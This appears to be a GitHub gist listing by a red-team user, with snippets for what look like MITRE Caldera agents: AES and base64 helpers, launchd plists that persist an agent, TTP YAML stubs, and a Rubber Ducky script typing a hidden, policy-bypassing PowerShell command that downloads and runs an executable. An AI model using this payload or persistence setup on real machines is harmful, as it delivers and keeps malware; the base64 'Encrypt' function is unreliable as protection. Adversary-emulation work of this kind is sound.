david privateducky

privateducky / aes.go
Created Jun 7, 2022 — forked from willshiao/aes.go
AES 256-CFB in Node.js, Go, and Python
View aes.go
package main
import (
"crypto/aes"
"crypto/cipher"
"crypto/rand"
"crypto/sha256"
"encoding/base64"
"fmt"
"io"
View pneuma-plist.sh
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "<http://www.apple.com/DTDs/PropertyList-1.0.dtd>">
<plist version="1.0">
<dict>
<key>Label</key>
<string>my.pneuma</string>
<key>ProgramArguments</key>
<array>
<string>${agent.location}</string>
</array>
View securitystate.sh
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "<http://www.apple.com/DTDs/PropertyList-1.0.dtd>">
<plist version="1.0">
<dict>
<key>Label</key>
<string>my.boomer</string>
<key>ProgramArguments</key>
<array>
<string>/usr/local/bin/python3</string>
<string>/Users/privateducky/Downloads/boomer.py</string>
privateducky / duckpneuma
Created Feb 7, 2021
Rubber ducky example
View duckpneuma
REM Rubber Ducky keystroke-injection example: the device types the lines below as if it were a keyboard.
DEFAULT_DELAY 150
DELAY 300
REM Open the Windows Run dialog (Win+R) and start PowerShell from it.
GUI r
DELAY 100
STRING powershell
ENTER
DELAY 300
REM The typed command starts a second PowerShell with a hidden window and -ExecutionPolicy Bypass.
REM It requests $server/file with System.Net.WebClient, writes the response under C:\Users\Public
REM using the name taken from the Content-Disposition header, then runs that file with iex.
REM $server is the loopback address 127.0.0.1:3391, so as written it only reaches a listener on the same host.
REM Defender notes: the hidden-window and Bypass arguments, the WebClient download and the write-then-run
REM in C:\Users\Public are visible in process command-line and PowerShell script-block logging;
REM USB device control policies limit untrusted keyboard (HID) devices.
STRING powershell.exe -W Hidden -ExecutionPolicy Bypass {$server="http://127.0.0.1:3391"; $url="$server/file"; $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); $wc.Headers.add("server", $server); $wc.Headers.add("file","pneuma.exe"); ($data=$wc.DownloadData($url)) -and ($name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","")) -and ([io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data)) | Out-Null; iex "C:\Users\Public\$name.exe";}
ENTER
DELAY 1500
View gist:20028b269e28fc46b13f73895cb71d70
import argparse
import json
import os
import requests
from datetime import datetime
class Installer:
def __init__(self):
View ttp2.yml
id: 300157e5-f4ad-4569-b533-9d1fa0e74d74
metadata:
version: 1
authors:
- privateducky
- MITRE
tags:
- Crown Jewels
name: Compress staged directory
description: |
View ttp1.yml
id: 6469befa-748a-4b9c-a96d-f191fde47d89
metadata:
version: 2
authors:
- privateducky
- MITRE
tags:
- Crown Jewels
name: Create new directory
description: |
View base64.go
// Encrypt returns the standard (padded) base64 encoding of bites.
//
// Despite its name it applies no cipher and uses no key: base64 is a
// reversible encoding, so the output offers no confidentiality or integrity
// protection to whoever can read it.
func Encrypt(bites []byte) []byte {
	// Size the output exactly, then encode straight into it.
	encoded := make([]byte, b64.StdEncoding.EncodedLen(len(bites)))
	b64.StdEncoding.Encode(encoded, bites)
	return encoded
}
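// Decrypt decodes text from standard (padded) base64 and returns the decoded
// bytes as a string.
//
// Despite its name no key or cipher is involved: this only reverses a base64
// encoding, so it must not be relied on for confidentiality or integrity.
// Malformed input yields "" rather than a partially decoded value.
func Decrypt(text string) string {
	beacon, err := b64.StdEncoding.DecodeString(text)
	if err != nil {
		// DecodeString returns the bytes decoded before the failure; drop them
		// so callers never act on a truncated message.
		return ""
	}
	// DecodeString yields []byte; convert explicitly to match the string
	// return type (returning the slice directly does not compile).
	return string(beacon)
}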
View golang-encryption.go
//Encrypt the results
func Encrypt(bites []byte) []byte {
plainText, err := pad(bites, aes.BlockSize)
if err != nil {
log.Print(err)
return make([]byte, 0)
}
block, _ := aes.NewCipher(encryptionKey)
cipherText := make([]byte, aes.BlockSize+len(plainText))
iv := cipherText[:aes.BlockSize]
View encrypt1.js
// A fresh random IV of BLOCK_SIZE bytes is drawn for every encryption.
const iv = crypto.randomBytes(BLOCK_SIZE)
const cipher = crypto.createCipheriv(ALGORITHM, key, iv)
// NOTE(review): no integrity check is visible in this snippet. If ALGORITHM is an
// unauthenticated mode, pair it with a MAC or use an AEAD mode — confirm.
let cipherText
try {
  // Encrypt the UTF-8 text to hex, then prefix the hex-encoded IV to the result.
  const body = cipher.update(text, 'utf8', 'hex') + cipher.final('hex')
  cipherText = iv.toString('hex') + body
} catch (e) {
  // Any failure during encryption is reported to later code as a null result.
  cipherText = null
}